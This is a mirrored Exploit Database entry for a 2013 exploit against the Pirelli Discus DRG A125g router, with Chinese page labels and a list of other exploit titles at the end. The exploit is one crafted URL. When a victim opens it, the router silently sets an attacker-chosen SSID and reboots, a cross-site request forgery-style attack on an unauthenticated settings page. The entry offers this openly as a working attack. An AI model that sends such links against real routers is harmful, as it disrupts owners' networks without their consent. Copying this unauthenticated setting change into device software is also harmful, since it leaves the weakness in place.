Pirelli Discus DRG A125g – Remote Change SSID Value

Exploit Database
10 阅读

作者： Sebastián Magof

日期： 2013-11-24
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/29794/

# Exploit Title: Pirelli Discus DRG A125g remote change SSID value
vulnerability
# Hardware: Pirelli Discus DRG A125g
# Date: 2013/11/23
# Exploit Author: Sebastián Magof
# Tested on: Linux/Windows
# Twitter: @smagof
# Greetz: Family, friends && under guys.
# Special Greetz:
# (\/)
# (**) αlpha
#(")(")


#Exploit:

http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof

#info: where the parameter "wlSsid"is where the attacker will enter the
new SSID. If the victim clicks on the url your modem / router will reboot
automatically with the new SSID provided by the attacker.

last Exploits
Pirelli Discus DRG A125g – Remote Change SSID Value的更多信息

iLister Listing Software – Local File Inclusion：
BbZL.php – Remote File Inclusion：
PHPMySpace Gold 8.0 – ‘gid’ SQL Injection：
Subrion CMS 4.0.5 – SQL Injection：
ECOA Building Automation System – Configuration Download Information Disclosure：
PreProject Multi-Vendor Shopping Malls – ‘products.php?sid’ SQL Injection：
ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure：
MC Coming Soon Script – Arbitrary File Upload / Improper Access Restrictions：